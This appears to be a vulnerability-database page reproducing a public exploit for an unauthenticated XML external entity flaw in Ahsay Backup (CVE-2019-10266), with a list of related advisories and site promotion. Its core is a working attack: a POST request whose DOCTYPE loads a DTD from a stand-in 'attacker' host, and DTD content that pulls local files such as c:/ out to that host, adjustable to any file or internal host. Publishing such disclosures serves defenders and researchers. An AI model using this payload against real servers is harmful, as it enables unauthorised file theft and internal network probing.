| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection Vulnerability | 26 Jul 201900:00 | – | zdt | |
| Ahsay Systems Cloud Backup Suite Cross-Site Scripting Vulnerability | 30 Jul 201900:00 | – | cnvd | |
| Ahsay Systems Cloud Backup Suite Information Disclosure Vulnerability | 29 Jul 201900:00 | – | cnvd | |
| CVE-2019-10263 | 26 Jul 201920:44 | – | cve | |
| CVE-2019-10266 | 26 Jul 201920:51 | – | cve | |
| CVE-2019-10263 | 26 Jul 201920:44 | – | cvelist | |
| CVE-2019-10266 | 26 Jul 201920:51 | – | cvelist | |
| EUVD-2019-2266 | 7 Oct 202500:30 | – | euvd | |
| Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection | 26 Jul 201900:00 | – | exploitpack | |
| CVE-2019-10263 | 26 Jul 201921:15 | – | nvd |
# Unauthenticated XML External Entity (XXE) in Ahsay Backup v7.x - v8.1.0.50.
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81050/cbs-win.exe
# Version: 7.x < 8.1.0.50
# Tested on: Windows / Linux
# CVE : CVE-2019-10266
#Ahsay is vulnerable to a OOB Unauthenticated XML External Entity
#More info https://www.wbsec.nl/ahsay/#CVE-2019-10263
Sending the following POST request will trigger the XXE:
POST /obs/obm8/user/setUserProfile HTTP/1.1
Content-Type: application/octet-stream
Content-Length: 126
Host: 172.16.238.213:80
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker/oob"> %remote;%intern; %trick;]>
On http://attacker/oob add the following content:
<!ENTITY % payl SYSTEM "file:///c:/"><!ENTITY % intern "<!ENTITY %
trick SYSTEM 'file://:%payl;/%payl;'>">
Here it is possible to change file:///c:/ to any directory/file or internal host.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation